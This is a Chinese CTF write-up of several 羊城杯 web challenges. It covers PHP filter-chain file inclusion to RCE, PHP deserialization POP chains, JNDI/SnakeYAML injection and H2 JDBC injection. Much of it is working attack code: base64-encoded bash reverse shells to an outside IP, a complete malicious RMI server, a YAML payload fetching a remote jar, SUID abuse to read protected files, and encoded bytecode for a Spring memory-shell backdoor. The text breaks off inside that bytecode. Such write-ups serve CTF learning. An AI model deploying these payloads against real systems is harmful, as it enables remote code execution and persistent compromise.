羊城杯

羊城杯

rce_me

文件包含,但是有过滤,可以直接URL编码绕过黑名单。直接用php lfi的终极payload直接打:

/?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.GBK.UTF-8|convert.iconv.IEC%5fP27-1.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859%5f4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT%5fJISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT%5fJISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1162.UTF32|convert.iconv.L4.T.61|convert.iconv.ISO6937.EUC-JP-MS|convert.iconv.EUCKR.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859%5f3.UTF16|convert.iconv.863.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT%5fJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd&1=system('echo+YmFzaCAtaSA%2bJi9kZXYvdGNwLzQ3Ljk2LjE3My4xMTYvMjMzMyAwPiYx|base64+-d|bash')%3b

反弹shell权限不够读flag。找suid文件

find / -perm -u=s -type f 2>/dev/null

发现date,直接

date -f /flag

step_by_step-v3

简单的反序列化。exp.php

<?php
class cheng
{
    public $c1;
    public function __construct($c1)
    {
        $this->c1 = $c1;
    }
}
class bei
{
    public $b1;
    public function __construct()
    {
        $this->b1 = new yang();
    }
}
class yang
{
    public $y1;
    public function __construct()
    {
        $this->y1 = "phpinfo";
    }
}
echo urlencode(serialize(new cheng(new bei())));

有个文件上传,但是黑名单不知道,没啥想法,看了一下phpinfo,结果flag就在phpinfo里面

Safepop

又是反序列化。需要绕过 throw,还要绕过wakeup。想到天翼杯的一道绕过方法,只要在反序列化数据中加入额外的属性即可绕过wakeup。payload:

a%3A1%3A%7Bi%3A0%3BO%3A1%3A%22B%22%3A2%3A%7Bs%3A1%3A%22p%22%3Bs%3A10%3A%22cat+%2Fflag%3F%22%3Bs%3A1%3A%22a%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A1%3A%22a%22%3BO%3A3%3A%22Fun%22%3A2%3A%7Bs%3A9%3A%22%00Fun%00func%22%3Bs%3A6%3A%22system%22%3Bs%3A1%3A%22p%22%3BO%3A4%3A%22Test%22%3A0%3A%7B%7D%7D;%7D%7D%7D 

在最后的第二个 } 后面加个分号即可绕过即
直接rce。pop链的exp.php:

<?php
class Fun
{
    private $func = 'system';
    public function __construct()
    {
        $this->p = new Test();
    }
}
class B
{
    public $p;
    public function __construct()
    {
        $this->p = "cat /flag?";
        $this->a = new A();
    }
}
class Test{
    public function __construct()
    {
    }
}
class A {
    public $a;
    public function __construct()
    {
        $this->a = new Fun();
    }
}
$a = array(new B());
echo urlencode(serialize($a));

simple_json(复现)

java杀我。没想到学了这么久java,还是写不出题,还是太菜了。。。题目给了payload,考的是绕过高版本jndi注入,之前的Dest0g3 520迎新赛的ljctr就是考这个,没好好复现,直接吃大亏。整了一下午的snakeyaml,都没复现成,经典熬大夜头昏昏沉沉的。直接拿github的payload:https://github.com/artsploit/yaml-payload
下载下来修改里面的exp:

public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4xNzMuMTE2LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

然后需要在服务器上开一个rmi服务。直接被整麻了。本来打算手鲁一个,结果死活连不上,不懂啥原因。直接抄一波工具。改之前的jndi_tools.jar里面的RMI(修改el payload即可):

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.DataInputStream;
import java.io.DataOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.io.OutputStream;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.rmi.MarshalException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RMISocketFactory;
import java.rmi.server.UID;
import java.util.Arrays;
import java.util.Scanner;
import javax.naming.Reference;
import javax.naming.StringRefAddr;
import javax.net.ServerSocketFactory;
import org.apache.naming.ResourceRef;

public class YamlJNDI {
    public static void main(String[] args) throws Exception {
        int port = 6666;
        int rmi = 1099;
        String evilCode = "curl dnslog.wyzxxz.cn";
        String type = "el-linux";
        String hostname = "47.96.173.116";
//        if (args.length < 3) {
//            System.err.println("[-] Usage: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 \"curl dnslog.cn\"");
//            System.exit(-1);
//            return;
//        }
//        if (args.length >= 3) {
//            port = Integer.parseInt(args[0]);
//            rmi = Integer.parseInt(args[1]);
//            evilCode = args[2];
//            try {
//                type = args[3].toLowerCase();
//            } catch (Exception e) {
//                type = "el-linux";
//            }
//        }
        try {
            hostname = InetAddress.getLocalHost().getHostName();
        } catch (Exception exception) {}
        System.err.println("[-] rmi_port:" + String.valueOf(port) + ", socket_port:" + String.valueOf(rmi) + ", evilcode: " + evilCode);
        while (true) {
            try {
                Long.valueOf(hostname.replace(".", ""));
                break;
            } catch (Exception e) {
                System.out.println("[-] current hostname error: " + hostname);
                Scanner sc = new Scanner(System.in);
                System.out.println("[-] please enter new hostname(ip)");
                System.out.print("> ");
                hostname = sc.nextLine().trim();
            }
        }
        System.setProperty("java.rmi.server.hostname", hostname);
        System.err.println("[-] use payload: rmi://" + hostname + ":" + String.valueOf(port) + "/Object");
        ServerSocket ss = null;
        SMRMISocket SMSS = new SMRMISocket();
        SMSS.setPort(rmi);
        try {
            RMISocketFactory.setSocketFactory(SMSS);
            System.out.println("[-] Creating SocketFactory on port " + String.valueOf(rmi));
        } catch (Exception localException) {
            localException.printStackTrace();
            System.out.println("error in SMRMISocket");
        }
        Registry registry = LocateRegistry.createRegistry(port);
        System.out.println("[-] Creating evil RMI registry on port " + String.valueOf(port));
        try {
            if (type.startsWith("el-")) {
                ResourceRef ref = new ResourceRef("org.yaml.snakeyaml.Yaml", null, "", "",
                        true, "org.apache.naming.factory.BeanFactory", null);
                String yaml = "!!javax.script.ScriptEngineManager [\n" +
                        "  !!java.net.URLClassLoader [[\n" +
                        "    !!java.net.URL [\"http://47.96.173.116:8000/yaml-payload.jar\"]\n" +
                        "  ]]\n" +
                        "]";
                ref.add(new StringRefAddr("forceString", "a=load"));
                if (type.endsWith("linux")) {
                    ref.add(new StringRefAddr("a", yaml));
                } else if (type.endsWith("win")) {
                    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd.exe','/c','" + evilCode + "']).start()\")"));
                } else {
                    ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"java.lang.Runtime.getRuntime().exec('" + evilCode + "')\")"));
                }
                ReferenceWrapper referenceWrapper = new ReferenceWrapper((Reference)ref);
                registry.bind("Object", referenceWrapper);
            } else if (type.equals("groovy")) {
                ResourceRef ref = new ResourceRef("groovy.lang.GroovyClassLoader", null, "", "", true, "org.apache.naming.factory.BeanFactory", null);
                ref.add(new StringRefAddr("forceString", "x=parseClass"));
                String script = "@groovy.transform.ASTTest(value={\n    assert java.lang.Runtime.getRuntime().exec(\"" + evilCode + "\")\n})\ndef x\n";
                ref.add(new StringRefAddr("x", script));
                ReferenceWrapper referenceWrapper = new ReferenceWrapper((Reference)ref);
                registry.bind("Object", referenceWrapper);
            } else {
                System.err.println("[-] Usage: java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 \"curl dnslog.cn\" el-win/el-linux/groovy");
                System.exit(-1);
                return;
            }
            ss = SMSS.getSS();
            handleSocket(ss);
        } catch (Exception e) {
            System.out.println("error. " + e.getMessage());
        }
        System.out.println("[-] end.");
    }

    private static void handleSocket(ServerSocket ss) {
        Socket s = null;
        try {
            System.out.println("[-] waiting target connect RMI SocketFactory ...");
            while ((s = ss.accept()) != null) {
                InetSocketAddress remote = (InetSocketAddress)s.getRemoteSocketAddress();
                System.err.println("[*] Have connection from " + remote);
                InputStream is = s.getInputStream();
                InputStream bufIn = is.markSupported() ? is : new BufferedInputStream(is);
                bufIn.mark(4);
                try {
                    DataInputStream in = new DataInputStream(bufIn);
                    int magic = in.readInt();
                    short version = in.readShort();
                    if (magic != 1246907721 || version != 2) {
                        s.close();
                        continue;
                    }
                    OutputStream sockOut = s.getOutputStream();
                    BufferedOutputStream bufOut = new BufferedOutputStream(sockOut);
                    try {
                        DataOutputStream out = new DataOutputStream(bufOut);
                        byte protocol = in.readByte();
                        switch (protocol) {
                            case 75:
                                out.writeByte(78);
                                if (remote.getHostName() != null) {
                                    out.writeUTF(remote.getHostName());
                                } else {
                                    out.writeUTF(remote.getAddress().toString());
                                }
                                out.writeInt(remote.getPort());
                                out.flush();
                                in.readUTF();
                                in.readInt();
                            case 76:
                                doMessage(s, in, out);
                                break;
                            default:
                                System.err.println("Unsupported protocol");
                                s.close();
                                continue;
                        }
                        bufOut.flush();
                        out.flush();
                    } catch (Exception e) {
                        e.printStackTrace();
                    }
                } catch (Exception e) {
                    e.printStackTrace();
                }
                System.err.println("[*] Start send evil code to " + remote.getHostName());
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static class SMRMISocket extends RMISocketFactory {
        private ServerSocket ss;

        private int port = 53;

        public Socket createSocket(String host, int port) throws IOException {
            return new Socket(host, port);
        }

        public ServerSocket createServerSocket(int port) throws IOException {
            if (port == 0)
                port = this.port;
            this.ss = ServerSocketFactory.getDefault().createServerSocket(port);
            return this.ss;
        }

        public ServerSocket getSS() {
            return this.ss;
        }

        private void setPort(int port) {
            this.port = port;
        }
    }

    private static boolean handleRMI(ObjectInputStream ois, DataOutputStream out) throws Exception {
        int method = ois.readInt();
        ois.readLong();
        if (method != 2)
            return false;
        String object = (String)ois.readObject();
        System.err.println("[*] Is RMI.lookup call for " + object + " " + method);
        return true;
    }

    private static void doMessage(Socket s, DataInputStream in, DataOutputStream out) throws Exception {
        System.err.println("[*] Reading message...");
        int op = in.read();
        switch (op) {
            case 80:
                doCall(in, out);
                break;
            case 82:
                out.writeByte(83);
                break;
            case 84:
                UID.read(in);
                break;
            default:
                throw new IOException("unknown transport op " + op);
        }
        s.close();
    }

    private static void doCall(DataInputStream in, DataOutputStream out) throws Exception {
        ObjID read;
        ObjectInputStream ois = new ObjectInputStream(in) {
            protected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {
                if ("[Ljava.rmi.server.ObjID;".equals(desc.getName()))
                    return ObjID[].class;
                if ("java.rmi.server.ObjID".equals(desc.getName()))
                    return ObjID.class;
                if ("java.rmi.server.UID".equals(desc.getName()))
                    return UID.class;
                if ("java.lang.String".equals(desc.getName()))
                    return String.class;
                throw new IOException("Not allowed to read object");
            }
        };
        try {
            read = ObjID.read(ois);
        } catch (IOException e) {
            throw new MarshalException("unable to read objID", e);
        }
        if (read.hashCode() == 2) {
            handleDGC(ois);
        } else if (read.hashCode() == 0) {
            handleRMI(ois, out);
        }
    }

    private static void handleDGC(ObjectInputStream ois) throws IOException, ClassNotFoundException {
        ois.readInt();
        ois.readLong();
        System.err.println("[-] Is DGC call for " + Arrays.toString((Object[])ois.readObject()));
    }
}

然后直接打成jar包,pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <groupId>org.example</groupId>
    <artifactId>snakeyaml_jndi</artifactId>
    <version>1.0</version>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
                <executions>
                    <execution>
                        <goals>
                            <goal>repackage</goal>
                        </goals>
                    </execution>
                </executions>
            </plugin>
        </plugins>
    </build>

    <dependencies>
        <dependency>
            <groupId>org.apache.tomcat.embed</groupId>
            <artifactId>tomcat-embed-core</artifactId>
            <version>9.0.30</version>
            <scope>compile</scope>
        </dependency>
    </dependencies>

    <properties>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
    </properties>

</project>

传到vps直接运行。然后把上面的yaml_payload.jar开启http服务即可。最后payload:

{"content" : {"@type": "ycb.simple_json.service.JNDIService", "target":"rmi://47.96.173.116:6666/Object"}, "msg":{"$ref":"$.content.context"}}

little_jvav(学不会)

没见过的东西,暂时找到一篇类似的文章:https://packetstormsecurity.com/files/165676/H2-Database-Console-Remote-Code-Execution.html
参考wp:https://mp.weixin.qq.com/s?srcid=0905PwTfAcHT1P2oIwXe0vSZ&scene=23&sharer_sharetime=1662358159364&mid=2247492779&sharer_shareid=af08bc9c7653e427562dda803abf19d6&sn=5ce1044c52f412c8b47c7ffccb4818c5&idx=1&__biz=MzIzMTQ4NzE2Ng%3D%3D&chksm=e8a1c77adfd64e6c01f21ab1de8a502c2a47a4d09a4cea289bb58ae725f64bb266b9e8db3d8e&mpshare=1#rd

找不到啥有关的文章,那就先射箭再画靶。直接拿wp的exp跑一遍,本地跑一下。
稍微修改了一下,用Interceptor内存马,具体就是网鼎杯那个ssti的那里的Test和内存马代码:https://47.96.173.116/2022/08/27/%e7%bd%91%e9%bc%8e%e6%9d%af/#header-id-4

package ycb;

import javassist.ClassPool;
import ycb.tool.SecurityHelper;

import java.util.Base64;

public class Exp {
    public static void main(String[] args) throws Exception {
//        org.springframework.cglib.core.ReflectUtils.defineClass("ycb.Test",java.util.Base64.getDecoder().decode("yv66vgAAADQAYAoAFQAtCQAuAC8IADAKADEAMgoAMwA0CAA1CwA2ADcHADgIADkLAAgAOgcAOwgAJAoAPAA9CgA+AD8KAD4AQAcAQQcAQgoAEQAtCgAQAEMHAEQHAEUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACkx5Y2IvVGVzdDsBAAhkb0luamVjdAEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAWYWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAQExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvQWJzdHJhY3RIYW5kbGVyTWFwcGluZzsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAKUxqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAKRXhjZXB0aW9ucwcARgcARwEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMABYAFwcASAwASQBKAQAHc3VjY2VzcwcASwwATABNBwBODABPAFABADlvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5zZXJ2bGV0LkRpc3BhdGNoZXJTZXJ2bGV0LkNPTlRFWFQHAFEMAFIAUwEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwwAVABVAQA+b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9oYW5kbGVyL0Fic3RyYWN0SGFuZGxlck1hcHBpbmcHAFYMAFcAWAcAWQwAWgBbDABcAF0BABNqYXZhL3V0aWwvQXJyYXlMaXN0AQAVeWNiL3dlYi9DbWRDb250cm9sbGVyDABeAF8BAAh5Y2IvVGVzdAEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAA9qYXZhL2xhbmcvQ2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaACEAFAAVAAAAAAACAAEAFgAXAAEAGAAAADMAAQABAAAABSq3AAGxAAAAAgAZAAAACgACAAAADAAEAA0AGgAAAAwAAQAAAAUAGwAcAAAAAQAdABcAAgAYAAAAyAADAAUAAABIsgACEgO2AAS4AAUSBgO5AAcDAMAACEwrEgm5AAoCAMAAC00SCxIMtgANTi0EtgAOLSy2AA/AABA6BBkEuwARWbcAErYAE1exAAAAAwAZAAAAIgAIAAAAEAAIABEAFwASACMAEwArABQAMAAVADoAFgBHABcAGgAAADQABQAAAEgAGwAcAAAAFwAxAB4AHwABACMAJQAgACEAAgArAB0AIgAjAAMAOgAOACQAJQAEACYAAAAMAAEAOgAOACQAJwAEACgAAAAGAAIAKQAqAAEAKwAAAAIALA=="),org.springframework.util.ClassUtils.getDefaultClassLoader()).newInstance().doInject();
//        byte[] bytes = ClassPool.getDefault().get("ycb.Test").toBytecode();
//        byte[] base64 = Base64.getEncoder().encode(bytes);
//        System.out.println(new String(base64));
        String out ;
        out = SecurityHelper.encrypt("n3k0","destoryDataSource");
        System.out.println(out);
        out = SecurityHelper.encrypt("n3k0","createPool");
        System.out.println(out);
        String split_str = "#&DS_SPLITTAG&#";
// String[] paramsStr = new String[]{"druid","mysql","com.mysql.cj.jdbc.Driver","jdbc:mysql://120.26.59.137:3309/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.Se rverStatusDiffInterceptor&autoDeserialize=true","linux_passwd","admin","druid","10","10 ","1"};
            String[] paramsStr = new String[]{"druid","mysql","org.h2.Driver",
                    "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE TRIGGER edi BEFORE SELECT ON\n" +
            "INFORMATION_SCHEMA.TABLES AS $$//javascript\n" +
                    "org.springframework.cglib.core.ReflectUtils.defineClass(\"ycb.Test\",java.util.Base64.getDecoder().decode(\"yv66vgAAADQAYAoAFQAtCQAuAC8IADAKADEAMgoAMwA0CAA1CwA2ADcHADgIADkLAAgAOgcAOwgAJAoAPAA9CgA+AD8KAD4AQAcAQQcAQgoAEQAtCgAQAEMHAEQHAEUBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACkx5Y2IvVGVzdDsBAAhkb0luamVjdAEAB2NvbnRleHQBADdMb3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvY29udGV4dC9XZWJBcHBsaWNhdGlvbkNvbnRleHQ7AQAWYWJzdHJhY3RIYW5kbGVyTWFwcGluZwEAQExvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9zZXJ2bGV0L2hhbmRsZXIvQWJzdHJhY3RIYW5kbGVyTWFwcGluZzsBAAVmaWVsZAEAGUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBABNhZGFwdGVkSW50ZXJjZXB0b3JzAQAVTGphdmEvdXRpbC9BcnJheUxpc3Q7AQAWTG9jYWxWYXJpYWJsZVR5cGVUYWJsZQEAKUxqYXZhL3V0aWwvQXJyYXlMaXN0PExqYXZhL2xhbmcvT2JqZWN0Oz47AQAKRXhjZXB0aW9ucwcARgcARwEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMABYAFwcASAwASQBKAQAHc3VjY2VzcwcASwwATABNBwBODABPAFABADlvcmcuc3ByaW5nZnJhbWV3b3JrLndlYi5zZXJ2bGV0LkRpc3BhdGNoZXJTZXJ2bGV0LkNPTlRFWFQHAFEMAFIAUwEANW9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvV2ViQXBwbGljYXRpb25Db250ZXh0AQAccmVxdWVzdE1hcHBpbmdIYW5kbGVyTWFwcGluZwwAVABVAQA+b3JnL3NwcmluZ2ZyYW1ld29yay93ZWIvc2VydmxldC9oYW5kbGVyL0Fic3RyYWN0SGFuZGxlck1hcHBpbmcHAFYMAFcAWAcAWQwAWgBbDABcAF0BABNqYXZhL3V0aWwvQXJyYXlMaXN0AQAVeWNiL3dlYi9DbWRDb250cm9sbGVyDABeAF8BAAh5Y2IvVGVzdAEAEGphdmEvbGFuZy9PYmplY3QBAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24BACBqYXZhL2xhbmcvSWxsZWdhbEFjY2Vzc0V4Y2VwdGlvbgEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAPG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0Q29udGV4dEhvbGRlcgEAGGN1cnJlbnRSZXF1ZXN0QXR0cmlidXRlcwEAPSgpTG9yZy9zcHJpbmdmcmFtZXdvcmsvd2ViL2NvbnRleHQvcmVxdWVzdC9SZXF1ZXN0QXR0cmlidXRlczsBADlvcmcvc3ByaW5nZnJhbWV3b3JrL3dlYi9jb250ZXh0L3JlcXVlc3QvUmVxdWVzdEF0dHJpYnV0ZXMBAAxnZXRBdHRyaWJ1dGUBACcoTGphdmEvbGFuZy9TdHJpbmc7SSlMamF2YS9sYW5nL09iamVjdDsBAAdnZXRCZWFuAQAmKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL09iamVjdDsBAA9qYXZhL2xhbmcvQ2xhc3MBABBnZXREZWNsYXJlZEZpZWxkAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEAA2dldAEAJihMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7AQADYWRkAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaACEAFAAVAAAAAAACAAEAFgAXAAEAGAAAADMAAQABAAAABSq3AAGxAAAAAgAZAAAACgACAAAADAAEAA0AGgAAAAwAAQAAAAUAGwAcAAAAAQAdABcAAgAYAAAAyAADAAUAAABIsgACEgO2AAS4AAUSBgO5AAcDAMAACEwrEgm5AAoCAMAAC00SCxIMtgANTi0EtgAOLSy2AA/AABA6BBkEuwARWbcAErYAE1exAAAAAwAZAAAAIgAIAAAAEAAIABEAFwASACMAEwArABQAMAAVADoAFgBHABcAGgAAADQABQAAAEgAGwAcAAAAFwAxAB4AHwABACMAJQAgACEAAgArAB0AIgAjAAMAOgAOACQAJQAEACYAAAAMAAEAOgAOACQAJwAEACgAAAAGAAIAKQAqAAEAKwAAA